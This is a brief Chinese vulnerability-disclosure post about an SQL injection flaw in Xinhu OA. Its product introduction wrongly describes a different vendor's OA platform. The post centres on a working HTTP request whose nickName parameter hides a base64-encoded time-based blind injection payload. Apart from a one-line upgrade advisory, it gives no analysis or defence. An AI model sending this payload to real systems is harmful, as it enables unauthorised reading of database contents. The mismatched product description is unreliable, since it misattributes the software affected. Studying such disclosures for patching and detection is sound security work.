漏洞披露-信呼-OA

更多网安漏洞复现,可前往无问社区查看http://wwlib.cn/index.php/artread/artid/16564.html

0x01 产品简介

泛微数字化运营管理平台OA为组织提供从"可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理"

0x02 漏洞概述

信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

建议升级到最新版本已修复

0x03 复现环境

payload:

复制代码
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
相关推荐
菩提小狗16 小时前
每日安全情报报告 · 2026-07-09
网络安全·漏洞·cve·安全情报·每日安全
喜欢的名字被抢了17 小时前
MySQL核心机制:事务、锁与存储引擎
数据库·sql·mysql·教程
阿演20 小时前
DataDjinn v0.2.11:SQL 编辑、AI 协作和表格操作继续打磨
数据库·人工智能·sql
山峰哥21 小时前
‌Explain实战:打开数据库执行计划的黑盒‌
大数据·服务器·数据库·sql·深度优先·宽度优先
数据知道1 天前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
RestCloud1 天前
借助ETL工具,实现AI智能体+数据的落地
数据仓库·人工智能·sql·etl·etlcloud·数据集成平台·java脚本
上海云盾-小余1 天前
网站频繁遭遇 SQL 注入溯源与原生漏洞修复全流程总结
数据库·sql
其实防守也摸鱼2 天前
蓝队相关知识学习(1)---常用堡垒机和服务器
服务器·功能测试·学习·网络安全·网络攻击模型·攻防对抗·蓝队
_Jimmy_2 天前
SQLAlchemy 复杂 SQL 执行指南与模板库
python·sql
学逆向的2 天前
汇编——数据存储模式
开发语言·汇编·网络安全